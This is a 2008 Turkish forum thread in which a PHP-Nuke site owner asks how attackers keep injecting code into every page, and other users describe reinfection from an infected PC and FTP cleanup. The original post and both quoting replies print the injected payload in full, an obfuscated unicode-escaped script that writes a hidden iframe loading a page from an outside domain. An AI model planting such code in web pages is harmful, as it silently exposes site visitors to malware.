Tarih: 2008-04-01, 20:07:46 Mesaj konusu: siteye * i f r a m e * basıyorlar
merhaba arkadaşlar,
php nuke 7.6 kuruku bir sitem var.
son günlerde bütün modüllere ve sayfaların sonuna
Kod:
<script type="text/j a v a s c r i p t">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
bu yazan kodu basmışlar.
ve site " atomakayan.biz " uzantılı bir siteye yönlenmeye çalışıyor.
acaba bu nasıl bi saldırı, sizce açık nerede nasıl kapatmalıyım.
Tarih: 2008-04-02, 03:44:22 Mesaj konusu: Re: siteye * i f r a m e * basıyorlar
suleyman70 :
merhaba arkadaşlar,
php nuke 7.6 kuruku bir sitem var.
son günlerde bütün modüllere ve sayfaların sonuna
Kod:
<script type="text/j a v a s c r i p t">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
bu yazan kodu basmışlar.
ve site " atomakayan.biz " uzantılı bir siteye yönlenmeye çalışıyor.
acaba bu nasıl bi saldırı, sizce açık nerede nasıl kapatmalıyım.
yardımcı olursanız sevinirim.
evet Ayni olay Bendede vardi ftp deki ana dizindeki index.html index.php ve login.php ve ana dizindeki klassörlerin icinde böyle bir i f r a m e vardi ftp den silmekle bas edemedim.. en son caharem ftp komple silmek oldu daha önce 2 defa sildim yedekden yükledim ama malesef yedeklerimdede varmi:) sorun bilgisayarimdaki bir html veya php dosyasinda bulunan bir iframeden kaynaklaniyormus... vee o pc den hangi ftp ye baglandiysam o sitelere bulasmis...;);) temizlemekten bikmistimm.. ama sanirm bunu toplu halede ftp temizleme scripti var diye biliyorum hatta ali osman kardeslede konusmustum bu konuyu oda böyle bir scripten bahsetti.. neyse sonunda temizledim.. bu ara bazi vüsprogramlari yakalamiyor mesela NOD32 ve kayspersky bende yakalamadi.. Tek Cözüm FTP ya komple Scriptle Taratip o kodlari silmek yada FTP yi Komple silmek.. Ben Silmekle Basa Cikabildim.. umarimBuna Bir cözüm Cikar..
Tarih: 2008-04-02, 20:28:14 Mesaj konusu: Re: siteye * i f r a m e * basıyorlar
MIDNIGHT :
suleyman70 :
merhaba arkadaşlar,
php nuke 7.6 kuruku bir sitem var.
son günlerde bütün modüllere ve sayfaların sonuna
Kod:
<script type="text/j a v a s c r i p t">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u0074\u006f\u006d\u0061\u006b\u0061\u0079\u0061\u006e\u002e\u0062\u0069\u007a\u002f\u0061\u0066\u0074\u0065\u0072\u0066\u0074\u0070\u0063\u0068\u0065\u006b\u002f\u0030\u0031\u0030\u0034\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
bu yazan kodu basmışlar.
ve site " atomakayan.biz " uzantılı bir siteye yönlenmeye çalışıyor.
acaba bu nasıl bi saldırı, sizce açık nerede nasıl kapatmalıyım.
yardımcı olursanız sevinirim.
evet Ayni olay Bendede vardi ftp deki ana dizindeki index.html index.php ve login.php ve ana dizindeki klassörlerin icinde böyle bir i f r a m e vardi ftp den silmekle bas edemedim.. en son caharem ftp komple silmek oldu daha önce 2 defa sildim yedekden yükledim ama malesef yedeklerimdede varmi:) sorun bilgisayarimdaki bir html veya php dosyasinda bulunan bir iframeden kaynaklaniyormus... vee o pc den hangi ftp ye baglandiysam o sitelere bulasmis...;);) temizlemekten bikmistimm.. ama sanirm bunu toplu halede ftp temizleme scripti var diye biliyorum hatta ali osman kardeslede konusmustum bu konuyu oda böyle bir scripten bahsetti.. neyse sonunda temizledim.. bu ara bazi vüsprogramlari yakalamiyor mesela NOD32 ve kayspersky bende yakalamadi.. Tek Cözüm FTP ya komple Scriptle Taratip o kodlari silmek yada FTP yi Komple silmek.. Ben Silmekle Basa Cikabildim.. umarimBuna Bir cözüm Cikar..
Arkadaşlar mesajlarınızdan dolayı teşekkür ediyorum.
MIDNIGHT, arkadaşım seninde değin gibi ftpnin her aya bir ben yedeğini alıyorum. siteye eski yedekleri koyuyorum ama yine 1 gün sonra tekrar yine aynı kod sitenin her tarafına yayılmış oluyor.
ama ftp de bir " .pureftpd-upload.47ed6d93.15.4a54.8670426c " böyle yazan dosyalar var bunları bir türlü silemiyorum acaba bunlardanda kaynaklanıyormu diye düşünüyorum ? ftp yi komple taratmak için scripti nasıl bulabiliriz. ve bu silemediğim dosyaları nasıl silebilirim. önerilerinize ve yardımlarınıza ihtiyacım var. Sağlıcakla...
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
